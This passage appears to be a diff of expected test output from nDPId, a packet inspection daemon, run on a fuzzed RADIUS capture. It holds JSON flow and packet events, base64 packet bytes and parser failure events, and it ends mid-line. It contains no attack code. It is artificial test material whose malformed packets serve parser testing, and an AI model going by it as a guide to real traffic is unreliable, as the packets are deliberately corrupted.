00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1528997262272,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997262272,"pkt":"ABRP+4rqcNuYVcUlCABFAAEw\/tJAAPwRVKjG4hk1CgxAHgdnchABHO9uAkcBFNPCS391ou+9cV+4e8winsYaCwAAV8gbBVNQQxpuAAABNxA00HHPRTyBsiZ\/6IZyvYM7SEcCX4QDUPpLB\/Nfl+7+pUh0wsa+NLqA2uxWkFDu5HiEeuARNLVaDzSIzbsbfVqWHWeSG0JbhaHnOPPCnMTZqtKCAvxt6AWKG1d8LjPCNKE\/ymsqNvHxATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNTg5L2YwOjc5OjYwOmQxOjdkOjM3LzIyMFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTw+nZtWuGBh7\/qdpxMTkR"}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -151,26 +151,26 @@
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1528997294408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997294408,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/xpAAPsRVa\/G4hk1ChxAHgcUchAAzU8kC0oAxWEDMLFDKTYIfgbKyEyHMfIBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE1YWUvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjIxT0oBAjRIFwEAAAEFAACfFoRHbsDvI\/+46yBaysIsAgUAAJcLQv7ORgAASiNmmimRHNuLAQACCwUAAKEH8wkM8t7F6HlgkovXWwdQEo++iUihP9VHkRTh6mD7kgU="} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1528997294408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997294408,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/xpAAPsRVa\/G4hk1ChxAHgcUchAAzU8kC0oAxWEDMLFDKTYIfgbKyEyHMfIBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE1YWUvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjIxT0oBAjRIFwEAAAEFAACfFoRHbsDvI\/+46yBaysIsAgUAAJcLQv7ORgAASiNmmimRHNuLAQACCwUAAKEH8wkM8t7F6HlgkovXWwdQEo++iUihP9VHkRTh6mD7kgU="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01269{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997294408,"pkt":"AAAMB6xAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01255{"packet_event_id":1,"packet_event_name":"packet","packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997294408,"pkt":"AAAMB6xAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997294665} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997294665}
00730{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":130,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2296,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997294408,"pkt":"ABRP+4rqcNuYVcUnCPhFAAEw\/yNAAPwRVFfG4hk1CgxAHgcUchABHADcAksBFFLEf\/kOKgAErzLPbpm7axIaCwAAV8gbBVNQQxpuAAABNxA040janeSai176IwGdu20qfHT6JdVX190nBVzQ8vbUeCsV1xduBdcl\/a+H+pp\/9\/XZ2p4RNITv9nAcFfSIQXySxypwJddtE1ldHXfDo7SxndAJGg66ub4EawJGyutGrkBcdNZ\/YktYATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00716{"packet_event_id":1,"packet_event_name":"packet","packet_id":130,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2296,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997294408,"pkt":"ABRP+4rqcNuYVcUnCPhFAAEw\/yNAAPwRVFfG4hk1CgxAHgcUchABHADcAksBFFLEf\/kOKgAErzLPbpm7axIaCwAAV8gbBVNQQxpuAAABNxA040janeSai176IwGdu20qfHT6JdVX190nBVzQ8vbUeCsV1xduBdcl\/a+H+pp\/9\/XZ2p4RNITv9nAcFfSIQXySxypwJddtE1ldHXfDo7SxndAJGg66ub4EawJGyutGrkBcdNZ\/YktYATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":130,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2296,"global_ts_msec":1528997294874} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":130,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2296,"global_ts_msec":1528997294874}
01297{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":131,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997294408,"pkt":"AKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":131,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997294408,"pkt":"AKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":131,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997299762} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":131,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997299762}
01296{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997300431,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQRLAP8RAAAKDEAexpYZNXIQBxQCxwAAAU4Cv5wdq9spC4sVMXMqpc65j64aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqW6ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BCblJ0d29yay5vcmdZAxB+CDFjaXNjL4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYyAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAPYmZiM2E1SjI1YiwgNWIyMmE1YjMvZjA6Nyk6NjA6ZDE6N2Q6MzcvMjJqBAasFAESIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997300431,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQRLAP8RAAAKDEAexpYZNXIQBxQCxwAAAU4Cv5wdq9spC4sVMXMqpc65j64aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqW6ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BCblJ0d29yay5vcmdZAxB+CDFjaXNjL4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYyAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAPYmZiM2E1SjI1YiwgNWIyMmE1YjMvZjA6Nyk6NjA6ZDE6N2Q6MzcvMjJqBAasFAESIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528997307038} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528997307038}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1528997311323,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997311323,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQZAAP8RAAAKDEAexuAZNXIQBxQCxwAAAVACv44mJt0CcxbAbqYZaENsgGMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfIdQlXSVNQUmMwGgkAADghDQMxNwZbIqW\/ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLk1jYzMxMS4zZ3BwbmV0d29ydi5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmZiM2E1MjI1YiwgNXIyMmE1YjMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIyBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwNbGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQIAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGxFBKmVASgNwWy5gYQ7uGHIUIDaTD8g=="} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1528997311323,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997311323,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQZAAP8RAAAKDEAexuAZNXIQBxQCxwAAAVACv44mJt0CcxbAbqYZaENsgGMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfIdQlXSVNQUmMwGgkAADghDQMxNwZbIqW\/ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLk1jYzMxMS4zZ3BwbmV0d29ydi5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZ